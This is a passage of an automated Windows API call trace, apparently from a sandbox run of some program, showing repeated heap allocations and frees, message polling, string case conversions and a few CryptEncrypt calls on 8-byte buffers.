lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0154.055] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0154.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0154.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0154.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0154.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0154.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0154.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0154.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0154.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.055] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743a0 | out: hHeap=0x2af0000) returned 1 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0154.055] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0154.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0154.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0154.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0154.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0154.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0154.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0154.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0154.056] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0154.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa888 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0154.056] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0154.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0154.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0154.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0154.057] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.057] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0154.057] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0154.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0154.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0154.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0154.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0154.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0154.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0154.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0154.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0154.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaabd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0154.060] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0154.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.060] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0154.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.060] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.060] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.060] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.061] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.061] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0154.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaab88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0154.061] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a72778*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a72778*, pdwDataLen=0x8cef60*=0x8) returned 1 [0154.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.061] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0154.061] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.061] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0154.061] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.061] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.061] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0154.061] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.061] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0154.061] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.061] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.062] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.062] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.062] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0154.062] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.062] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0154.062] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.062] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.062] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.062] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.062] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 